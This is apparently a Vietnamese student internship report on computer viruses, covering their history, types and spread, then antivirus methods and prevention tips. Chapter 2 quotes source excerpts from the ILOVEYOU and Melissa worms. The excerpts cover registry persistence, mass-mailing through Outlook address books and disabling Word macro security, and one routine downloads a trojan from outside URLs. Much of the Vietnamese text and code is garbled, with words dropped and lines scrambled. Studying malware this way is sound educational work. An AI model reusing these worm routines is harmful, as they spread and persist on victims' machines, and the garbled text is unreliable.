TRƯỜNG CAO ĐẲNG CÔNG NGHỆ HÀ NỘI KHOA CÔNG NGHỆ THÔNG TIN ĐỒ ÁN/ BÁO CÁO THỰC TẬP TỐT NGHIỆP TÊN ĐỀ TÀI: TÌM HIỂU VỀ VIRUS MÁY TÍNH VÀ SỰ LÂY LAN CỦA NÓ MỤC LỤC Mục Lục…………………………………………………………………1 Lời Cảm Ơn…………………………………………………………… Lời Nói Đầu…………………………………………………………… CHƯƠNG 1: Giới Thiệu Chung………………………………………….8 Khái niệm virus…………………………………………………… Lược Sử virus……………………………………………………… Tổng quan virus…………………………………………………………15 Phân loaij virus…………………………………………………… … 18 Các hình thức lây nhiễm virus…………………………………………23 CHƯƠNG 2: Nguyên lý hoạt động kĩ thuật đặc trưng số virus chính…………………………………………………………………… 25 Boot vius…………………………………………………………………25 File vius…………………………………………………………………34 Virus window……………………………………………………….38 Macro virus………………………………………………………………40 Worm…………………………………………………………………… 43 CHƯƠNG 3: Một số kĩ thuật phòng chống virus………………………52 Các phần mềm diệt virus truyền thống………………………………….52 Phân tích lưu lượng……………………………………………………….54 Kết luận………………………………………………………………… 55 Một số cách phòng chống virus bản………………………………….56 Tài liệu tham khảo……………………………………………………….60 MỞ ĐẦU LỜI CẢM ƠN Đầu tiên, xin gửi lời cảm ơn chân thành đến cô Nguyễn Thị Loan giúp đỡ khơng thế, q trình thực đề án cô bảo hướng dẫn tận tình cho chúng tơi kiến thức lý thuyết, kỹ thao tác làm việc nhóm, cách giải vấn đề, đặt câu hỏi …Cô người truyền động lực chúng tôi, giúp chúng tơi hồn thành tốt đề tài Chân thành cảm ơn đến bạn nhóm thực tập hỗ trợ để chúng tơi hồn thành tốt công việc giao Tôi xin chân thành biết ơn tận tình dạy dỗ tất quý thầy cô Khoa Công nghệ thông tin – Trường Cao Đẳng Công Nghệ Hà Nội Lời cảm ơn chân thành sâu sắc, xin gửi đến gia đình, ln sát cánh động viên chúng tơi giai đoạn khó khăn NHẬN XÉT (Của giáo viên hướng dẫn) ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… NHẬN XÉT (Của giáo viên phản biện) ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… ………………………………………………………………………………… LỜI NÓI ÐẦU Virus máy tính, từ đời trở thành mối nguy hại tất hệ thống máy tính mạng giới Ðặc biệt, Việt Nam, phát triển hệ virus máy tính năm gần gây hậu mà để khắc phục chúng phải tiêu phí luợng lớn thời gian cung tiền bạc Mặt khác, khơng thể phủ nhận tính tích cực virus máy tính, virus máy tính phát triển đuợc dựa sơ xuất công nghệ nguời sử dụng nên thông qua việc tìm hiểu chế hoạt động virus, phương thức lây lan phá hoại đưa giải pháp cải thiện chất luợng độ an toàn phần mềm hệ thống Thế nhưng, có thực tế Việt Nam, tài liệu nghiên cứu virus máy tính vơ ỏi thiếu chi tiết, dẫn dến hậu nguời sử dụng máy tính thuờng khơng có đủ kiến thức cần thiết dể tự bảo vệ máy tính liệu truớc cơng virus máy tính Xuất phát từ yếu tố đề an lựa chọn đề tài: “Tìm hiểu virus lây lan nó” Đề tài chia làm chương, với nội dung chương sau: - Chương 1: Giới thiệu lịch sử hình thành phát triển virus máy tính qua thời kỳ từ đưa nhận định phát triển virus tương lai gần Các khái niệm định nghĩa virus máy tính nói riêng phần mềm độc hại nói chung - Chương 2: Tìm hiểu sở lý thuyết giúp xây dựng nên virus máy tính, phương thức lây lan phá hoại virus máy tính gắn với giai đoạn phát triển - Chương 3: Giới thiệu kỹ thuật phát virus kiến nghị nghiên cứu CHƯƠNG Tổng quan virus I.Khái niệm virus Trong khoa học máy tính, virus máy tính (thường người sử dụng gọi tắt virus) chương trình hay đoạn mã thiết kế nhằm thực ý đờ đó( thường mục đích phá hoại) có khả tự nhân chép vào đối tượng lây nhiễm khác (file, ổ đĩa, máy tính,…) Do cách thức hoạt động chúng giống virus sinh học nên người ta không ngần ngại đặt cho chúng tên “virus” đầy ấn tượng Thường có đặc điểm như: • Có kích thước nhỏ • Có khả lây lan • Hoạt động ngầm II.Lược sử virus máy tính Việc tìm hiểu lịch sử phát triển virus máy tính qua giai đoạn công nghệ cần thiết qua việc quan sát giai đoạn phát triển virus phát triển công nghệ (với điểm yếu) dự dốn phần khuynh huớng phát triển virus tương lai gần Thật sở lý thuyết virus máy tính xuất từ lâu, năm 1949, John von Newman viết “Lý thuyết cấu phần tử tự hành phức tạp – Theory and Organization of Complicated Automata” nêu ý tuởng chương trình tự nhân Ðến nam 1959, ba lập trình viên AT&T viết chương trình Core war có trang bị tính tự nhân tiêu diệt bảng mã đối phương, sau trở thành tính virus máy tính Sự phát triển virus nói riêng phần mềm độc hại nói chung chia làm bốn giai doạn kéo dài từ năm 1979 đến (trong tài liệu nuớc ngoài, tác giả hay sử dụng thuật ngữ “wave”, thuật ngữ “giai doạn” đuợc 10roj hon virus giai doạn thực phát triển trực tiếp từ giai đoạn truớc đó) Mỗi giai đoạn đại diện cho khuynh huớng công nghệ virus tận dụng triệt dể cơng nghệ 1.Giai doạn thứ (1979-1990) Những virus dầu tiên virus boot-sector lây hệ diều hành MS DOS Khoảng năm 1980 trở đi, số luợng virus tăng vọt với phát triển máy tính cá nhân Ðại diện giai đoạn xét đến virus Brain xuất năm 1986 virus Lehigh xuất năm 1987 Sau thời gian ngắn bắt đầu xuất thuật ngữ “worm” phần mềm có khả tự lây lan qua mạng Năm 1987, worm dầu tiên Christma Exec có khả lây lan qua e-mail mainframe IBM, ví dụ việc lừa đảo theo kiểu “social engineering”, nguời sử dụng bị đánh lừa để thực thi virus nội dung email cho biết duợc thực 10rojan vẽ thơng Noel, worm có thực việc vẽ thơng Noel lên hình (bằng cách sử dụng ngôn ngữ kịch REXX) đồng thời gửi tới nguời sử dụng khác nằm danh sách email nạn nhân Những nguời sử dụng tin tuởng nhận duợc email từ nguời họ quen biết họ mở email Ví dụ máy nguời sử dụng có file ảnh unmemo.jpg bị xóa thay file chứa đoạn mã worm có tên unmemo.jpg.vbs File unemp.mp3 bị ẩn thay file chứa đoạn mã worm có tên unemp.mp3.vbs Hai worm ta vừa xét có tốc độ lây lan vơ nhanh chóng phải sử dụng email công cụ để phát tán, vậy, nguời sử dụng cảnh giác, họ giảm thiểu đuợc lây lan tác hại chúng Vì thế, worm sau có xu huớng tự lây lan dựa vào bất cẩn nguời sử dụng, điển hình xu huớng worm Code Red, Blaster, Sobig v.v Ngày 18 tháng năm 2001, lỗi bảo mật tràn đệm Microsoft IIS Server đuợc phát hiện, sau ngày 26 tháng 6, Microsoft đưa vá lỗi muộn Ngày 12 tháng năm 2001, worm Code Red bắt đầu khai thác lỗi bảo mật sau lây nhiễm vào 250.000 máy tính Bắc Mỹ Châu Âu Khi lây nhiễm vào máy tính, worm kiểm tra ngày tháng Nếu ngày nằm khoảng từ dến 19 hàng tháng, tiến hành quét dịa IP đuợc sinh ngẫu nhiên để tìm kiếm lây nhiễm cho nhiều máy tính tốt từ ngày 20 đến 28 hàng tháng, worm khởi động việc công từ chối dịch vụ (Denial of Service – DoS) dến website http://www.whitehouse.org không hoạt động vào ngày 28 Tuy nhiên phiên Code Red lại lây lan chậm thủ tục phát sinh địa IP ngẫu nhiên có lỗi sinh dịa IP giống Vì Code Red ver.1 thực quét lây nhiễm lại máy tính bị nhiễm rời hạn chế lây lan nhiều Các kỹ thuật cài đặt vào máy tính nguời sử dụng Ðoạn mã sau duợc trích từ source code worm I Love You dể minh họ a cho kỹ thuật cài dặt vào máy tính nguời sử dụng họ mở file LOVELETTER-FOR-YOU.TXT.vbs c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") Bằng cách hai file MSKernel32.vbs LOVE-LETTER-FORYOU.TXT.vbs đuợc ghi vào root folder file Win32DLL.vbs đuợc ghi vào system folder máy tính Ðây file hạt nhân worm, tên chúng duợc đặt dể đánh lừa nguời sử dụng nhìn giống file hệ thống Windows Tiếp theo, để đảm bảo cho file đuợc thực thi máy tính khởi động, worm tạo thêm key Windows Registry regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curre ntVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs” regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curre ntVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" Hơi khác chút, lai ghép dòng worm dòng macro virus nên worm Melissa lây nhiễm vào file normal.dot máy tính nguời sử dụng file văn bị nhiễm macro đuợc nguời sử dụng mở nguợc lại, nhiễm vào văn khác chúng duợc nguời sử dụng đóng lại Lây lan qua email Worm Love Letter xây dựng hẳn thủ tục spreadtoemail() để thực việc phát tán qua email Ðể đảm bảo gửi email đến tất nguời, nguời lần sổ dịa (address book), worm tạo key Registry để đánh dấu Email gửi thuờng có dạng sau: Subject: ILOVEYOU Body: kindly check the attached LOVELETTER coming from me Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs Ðoạn mã sau đuợc trích từ source code worm Love Letter dể minh họa thủ tục phát tán qua email: sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WA B\"&a) if (regv="") then (int(a.AddressEntries.Count)>int(regv)) regv=1 then end for if ctrentries=1 if to a.AddressEntries.Count end sub malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\W AB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_ DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntrie s.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntrie s.Count end if next Set out=Nothing Set mapi=Nothing Worm Melissa gửi email dính kèm file doc dến 50 dịa dầu tiên, nhung truớc gửi di kiểm tra key HKEY_CURRENT_USER\Software\Microsoft\Office\ "Melissa?" = " by Kwyjibo", key khơng tờn thủ tục gửi email duợc kích hoạt Ðoạn mã sau duợc trích từ source code worm Melissa để minh họa thủ tục phát tán qua email : Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") " by Kwyjibo" Then DasMapiName.Logon If UngaDasOutlook "profile", "password" DasMapiName.AddressLists.Count DasMapiName.AddressLists(y) = For Set x = UngaDasOutlook.CreateItem(0) y = Then AddyBook To = Set BreakUmOffASlice = For AddyBook.AddressEntries.Count "Outlook" oo = To Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + If x > 50 Then oo = AddyBook.AddressEntries.Count "Important Message Next oo From " BreakUmOffASlice.Subject = & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = " by Kwyjibo" End If Phá hoại Worm Love Letter có hai đoạn cấu trúc phá hoại thủ tục listadriv trojan WINBUGSFIX Trong thủ tục listadriv làm nhiệm vụ tìm kiếm file thích hợp nguời sử dụng, xóa ẩn chúng thay thể file có tên tương tự chứa chương trình Ðoạn mã sau duợc trích từ source code worm Melissa dể minh họa kỹ thuật kiểm tra điều kiện kích hoạt.: If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters Game's over I'm outta here." Hạ mức bảo mật Word Ðoạn mã sau đuợc trích từ source code worm Melissa để minh họa kỹ thuật hạ mức bảo mật macro Microsoft Word: IfSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Micr osoft\Office\9.0\Word\Security", "Level") CommandBars("Macro").Controls("Security ").Enabled "" Then = False System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Micros oft\Office\9.0\Word\Security", "Level") = CommandBars("Tools").Controls("Macro").Enabled 1& Else = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Download trojan Ðoạn mã sau trích từ source code worm Lover Letter dể minh họa kỹ thuật tự động download Trojan máy tính nguời sử dụng: Randomize num = Int((4 * Rnd) + 1) if num = then regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetr dsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = then regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyq werWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = then regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEk bopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = then regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage","http ://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjk hYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7t hjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\WINBUGSFIX.exe")=0) then regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curre ntVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank" end if Ðiều đáng ý worm tự sinh giá trị ngẫu nhiên dặt vào IE homepage dể download trojan từ bốn địa máy nguời sử dụng, sau dó tạo key cho phép trojan chạy máy tính đuợc khởi động Cuối worm xóa IE homepage thành blank để xóa dấu vết CHƯƠNG Một số kĩ thuật phòng chống virus I Các phần mềm diệt virus truyền thống Trong năm gần đây, sau hứng chịu hậu nặng nề từ công worm Melissa, Love Letter, Code Red, SoBig, MyDoom v.v nhiều nguời sử dụng kinh ngạc tự hỏi phần mềm diệt virus mà họ sử dụng lại không ngăn chặn đuợc worm từ lúc chúng bắt đầu lây nhiễm vào máy họ làm để phần mềm diệt virus bảo vệ liệu họ tương lai Các chương trình chống virus truyền thống thuờng sử dụng hệ thống phát dựa việc đối sánh mẫu (pattern matching) phương pháp quét (scanner) Những hệ thống trích rút đoạn mã từ virus biết, nhập chúng vào sở liệu, so sánh file cần kiểm tra với sở liệu để kết luận file có virus hay khơng Nói chung, hệ thống kiểu thuờng có nhuợc điểm sau: • Hệ thống khơng thể phát unknown virus mà mẫu (đặc trung) chúng không đuợc chứa sở liệu • Rất khó để trích rút mẫu dặc trưng cho virus ngăn ngừa việc file bị nhận dạng nhầm virus • Những mẫu sở liệu sử dụng đuợc để đối sánh mẫu virus có nhiều biến thể khác Ðể cải tiến, chương trình chống virus đuợc bổ sung thêm chế so sánh cấu trúc chương trình bên cạnh việc so sánh mẫu Tuy nhiên kiểu so sánh dựa vào thông tin chất câu lệnh bị giới hạn với virus có biện pháp đề phòng từ truớc Do phát triển đáng sợ virus thời gian vừa qua mà công cụ diệt virus truyền thống thuờng khả phát ngăn chặn chúng Từ đặt yêu cầu cần phải có cơng nghệ phát xác hơn, thơng minh để ngăn chặn phá hoại virus chúng vừa xuất Một số phương pháp phát virus dựa hành vi đặc trưng chúng lây nhiễm vào file hay gửi email phát tán thơng qua việc phân tích hàm API Q trình phân tích bao gờm việc giải mã sử dụng kỹ thuật code simulation phân tích static code Code simulation: kỹ thuật mô xác thay đổi cấu trúc bên kiến trúc vi xử lý x86 bao gồm ghi, nhớ, cờ v.v ) thực câu lệnh Static code analysis: Phân tích câu lệnh để tìm kiếm lời gọi hàm khả nghi hệ điều hành Windows có chế bảo vệ file tài nguyên khác khỏi thao tác trực tiếp từ chương trình bình thuờng Ngay virus phải gọi hàm từ hệ điều hành để thực hành dộng gây hại Từ việc nghiên cứu hoạt động virus ta rút tập hợp hàm có khả liên quan đến hành vi chúng Hai kỹ thuật duợc sử dụng bổ trợ cho nhau, ví dụ truờng hợp gặp unknow virus có mã hóa kỹ thuật code simulation đuợc thực truớc để giải mã virus rời sau thực việc phân tích static code II Phân tích lưu luợng Worm phát tán qua email vừa chiếm dụng tài nguyên mạng vừa đuợc sử dụng phương tiện để thực công từ chối dịch vụ phân tán (Distributed Deny Of Service attack – DDoS) Trong thời gian gần dây đợt bùng phát worm công lây lan qua email ngày tăng, phần nguời sử dụng thuờng không cập nhật nâng cấp phần mềm diệt virus, phần yếu phần mềm việc phát unknown virus việc lọc không hiệu mail server Phần tập trung vào việc tìm hiểu hành vi đặc trưng dòng worm phát tán qua email thông qua việc nghiên cứu hai worm cụ thể SoBig MyDoom, đặc biệt việc phát tán làm thay đổi thông số lưu luợng mạng, từ dẫn tới cách tiếp cận để tự dộng phát tiêu diệt chúng Không virus email truyền thống, worm phát tán email không giới hạn số mục tiêu chúng hoàn toàn sổ dịa nạn nhân Những worm SoBig hay MyDoom biết tận dụng kỹ thuật lây lan nhu tìm kiếm domain name từ máy nạn nhân (bằng cách quét web caches ổ điã cứng) sau cố gắng xây dựng địa để chúng tiến hành gửi email phát tán Việc thống kê luu luợng duợc thực edge route tổ chức cụ thể Lưu luợng thống kê hai giai đoạn thời gian đặc biệt Giai đoạn đầu từ ngày tháng năm 2003 đến ngày tháng năm 2003 giai đoạn có lây lan worm SoBig, đặc biệt cao điểm vào ngày 16 tháng năm 2003 Giai đoạn thứ hai từ ngày 15 tháng năm 2004 đến ngày tháng năm 2004 giai đoạn có lây lan worm MyDoom, đặc biệt cao điểm vào ngày 24 tháng năm 2004 Thực việc công hai worm kéo dài suốt tháng giai đoạn tác động chúng lên việc thay đổi lưu luợng không đạt đuợc hai tuần Việc phân tích đuợc thực cách nghiên cứu mẫu lưu luợng, cụ thể thay đổi tỷ lệ lưu luợng TCP, SMTP, DNS truớc đợt bùng phát worm Nếu host thay đổi hành vi cách thiết lập số luợng lớn kết nối SMTP suốt đợt bùng phát worm, đuợc đánh dấu bị lây nhiễm, sau phải sử dụng thuật tốn khác để đánh giá việc lây nhiễm có thật hay không III Kết luận Bất chấp firewall, hệ thống dò tìm thiết bị bảo mật mạng khác, worm tiếp tục lây lan với tốc dộ ngày nhanh Việc phát triển mạnh mẽ worm làm công ty tổ chức phải xem việc phòng chống chúng phần q trình diều hành với chi phí ngày gia tăng Tuy nhiên việc phòng chống virus nói riêng phần mềm độc hại nói chung phút chưa đạt đuợc hiệu mong muốn số lý sau: • Các phần mềm đuợc viết ngày có nhiều tính năng, ngày phức tạp hệ tất yếu ngày có nhiều lỗi , virus worm tiếp tục phát triển chừng hệ thống máy tính có lỗi • Khi lỗi đuợc phát đuợc cung cấp vá (patch) nhiều nguời sử dụng, chí nguời điều hành khơng hình dung đuợc tầm quan trọng chúng chậm trễ việc vá lỗi hệ thống họ tạo điều kiện cho virus lưu trú lây lan sang hệ thống khác • Một lý việc thiếu trách nhiệm xã hội nguời viết virus Việc lần theo dấu vết virus từ việc phân tích mã lệnh để tìm nguời viết chúng khó khăn, trừ tác giả vơ tình hay cố ý để lộ dấu vết mã ng̀n, chí nguời viết virus bị nhận dạng bị bắt giữ, khó để khởi tố hệ thống luật pháp vấn đề tội phạm máy tính nhiều quốc gia chưa đuợc hồn thiện Do dó, lời tun án nhẹ nhàng Ví dụ: Robert Morirs, tác giả worm Morris năm 1988 nhận án năm tù treo 400 lao động cơng ích 10.000$ tiền phạt Chen Ing-hau bị bắt giữ Ðài loan viết virus Chernobyl sau đuợc trả tự khơng có khiếu nại từ phía quyền Onel de Guzman bị bắt tội viết virus Love Letter năm 2000 làm triệu máy tính bị hư hỏng đuợc tha Philippin thiếu điều luật xử phạt tội trạng Jan de Wit bị tuyên án 150 lao động cơng ích viết virus Anna Kournikova David L.Smith viết virus Mellisa năm 1999 làm triệu máy tính bị hư hại bị tuyên án 20 tháng tù 7500 $ tiền phạt IV Một số cách phòng chống virus Có 12 cách phòng chống bản: 4.1 Tường lửa (firewall) Kiểm soát liệu vào máy tính bạn cảnh báo hành vi đáng ngờ; công cụ bảo vệ máy tính chống lại xâm nhập bất hợp pháp cách quản lý toàn cổng máy tính kết nối với mơi trường bên ngồi (mạng Lan, Internet ) Tường lửa có sẵn Windows XP giám sát dòng liệu vào máy tính khơng kiểm sốt dòng liệu khỏi máy tính Người dùng gia đình thường có kinh nghiệm bảo mật virus, tường lửa không phát huy tác dụng người dùng khơng thể xử lý cảnh báo Hơn nữa, việc cài đặt tường lửa làm cho máy tính hoạt động chậm 4.2 Sử dụng phần mềm chống virus Rất nhiều viết giới thiệu với bạn đọc phần mềm chống virus tốt nhất, từ phần mềm "tất một" đến phần mềm độc lập miễn phí Chúng có điểm mạnh yếu riêng đáng buồn không phần mềm bảo vệ máy tính bạn cách tồn diện Một số bạn đọc khơng cài đặt phần mềm chống virus thấy hệ thống trở nên chậm chạp Họ chấp nhận mạo hiểm (hoặc không biết) rủi ro đánh đổi an toàn máy tính để lấy tốc độ Một vài bạn đọc lại cho máy tính an tồn hơn, bảo vệ tốt cài đặt nhiều phần mềm chống virus Điều khơng tốt xảy tranh chấp phần mềm chúng tranh giành quyền kiểm soát hệ thống Chú ý: - Thường xuyên cập nhật danh sách nhận dạng virus (virus definitions) giúp phần mềm làm việc hiệu - "Thủ" sẵn địa chỉ, nơi tải phần mềm BKVA trường hợp phần mềm phòng chống virus nước ngồi khơng phát virus có xuất xứ từ Việt Nam 4.3 Cập nhập sửa lỗi Lỗ hổng bảo mật phần mềm "điểm yếu" virus lợi dụng để xâm nhập vào máy tính bạn Thật khơng may điểm yếu lại nhiều người dùng không quan tâm đến việc Hãy giữ cho hệ điều hành, trình duyệt web phần mềm chống virus ln cập nhật tính tự động cập nhật (auto update); tính khơng hoạt động (do sử dụng quyền bất hợp pháp), cố gắng tải từ website nhà sản xuất cách thủ cơng Bạn tăng cường tính phòng thủ hiệu cho hệ thống tránh tình trạng virus "tái nhiễm" sau diệt 4.4 Trình duyệt an tồn Nếu so sánh, bạn dễ dàng nhận thấy Internet Explorer trình duyệt web có nhiều lỗ hổng bảo mật dù Microsoft liên tục đưa sửa lỗi Sử dụng trình duyệt thay Mozilla Firefox, Opera cài đặt thêm trình duyệt để tận dụng ưu điểm phần mềm tăng tính bảo mật lướt web 4.5 Suy nghĩ trước cài đặt Nhiều bạn đọc thích táy máy, tải cài đặt nhiều phần mềm khác để thử nghiệm Điều dẫn đến việc khơng kiểm sốt phần mềm làm máy tính Thực tế cho thấy cài đặt nhiều phần mềm "bổ sung" thêm lỗ hổng bảo mật mới, tạo điều kiện cho tin tặc dễ dàng xâm nhập vào máy tính bạn, góp phần làm đổ vỡ hệ thống phòng thủ mà bạn dày công tạo dựng 4.6 Sử dụng máy tính với quyền user Với Windows NT/2000/XP, việc đăng nhập sử dụng máy tính với tài khoản mặc định thuộc nhóm Administrators hành động mạo hiểm virus "thừa hưởng" quyền hạn tài khoản xâm nhập vào hệ thống, máy tính bạn trở thành zombie cơng máy tính khác Tài khoản thuộc nhóm Users khơng phép thay đổi thiết lập liên quan đến hệ thống, bạn tránh nhiều nguy bị phá hoại phiền toái, virus xâm nhập vào máy tính Sử dụng máy tính với quyền User khiến người dùng gặp nhiều khó khăn trình cài đặt ứng dụng thực số tác vụ liên quan đến hệ thống chúng tơi khuyến khích bạn đọc tự giới hạn quyền sử dụng máy tính Hơn nữa, bạn khơng cần cài thêm phần mềm phòng chống spyware Tài ngun hệ thống khơng bị chiếm dụng, máy tính hoạt động nhanh 4.7 Sao lưu hệ thống Bạn bỏ qua bước tin máy tính ln chạy tốt Hãy thực việc lưu vào thời điểm máy tính hoạt động ổn định, cài đặt phần mềm cần thiết Bạn đưa hệ thống trở lại trạng thái lưu với vài thao tác đơn giản cần thiết Để tạo tập tin ảnh phân vùng đĩa cứng, bạn sử dụng phần mềm Drive Image PowerQuest, Norton Ghost Symantec, DriveWorks V Communications, Acronis True Image Acronis Việc lưu hữu ích với bạn đọc thích táy máy, thử nghiệm tính phần mềm, thường xuyên truy cập vào website "đen" Bạn tiết kiệm nhiều thời gian thay phải xử lý cố virus gây phải cài lại HĐH phần mềm cần thiết 4.8 Cài đặt trương trình antivirus có chất lượng 4.9 Cài đặt trương trình Ani-Syware thời gian thực 4.10 Thường xuyên cập nhập trương trình diệt virus 4.11 Thực scan hàng ngày 4.12 Xử lý tính xem hình ảnh outlook Tài Liệu Tham Khảo Ngơ Anh Vũ (2002), Virus tin học huyền thoại thực tế, NXB Thành Phố Hờ Chí Minh Nguyễn Xn Hồi(1999) Tập giảng mơn học virus máy tính, Học Viện Kĩ Thuật Quân Sự Luận văn thạc sĩ khoa học thầy Trần Hải Nam, trường Đại Học Bách Khoa Hà Nội http://www.wikipedia.org http://vx.netlux.org : ... niệm định nghĩa virus máy tính nói riêng phần mềm độc hại nói chung - Chương 2: Tìm hiểu sở lý thuyết giúp xây dựng nên virus máy tính, phương thức lây lan phá hoại virus máy tính gắn với giai... thiết bị nhớ USB vào máy tính bị nhiễm virus, virus tự động lây nhiễm lên thiết bị nhớ USB Khi mang USB sang sử dụng máy tính khác, virus lại từ USB lây nhiễm vào máy tính Lây nhiễm virus, spyware,... đường để virus lây lan máy tính cách nhanh chóng Virus có khả tìm ổ đĩa chia sẻ mạng để lây nhiễm lên đó, từ virus tiếp tục lây vào máy tính sử dụng chung thư mục chia sẻ Lây nhiễm virus lỗ hổng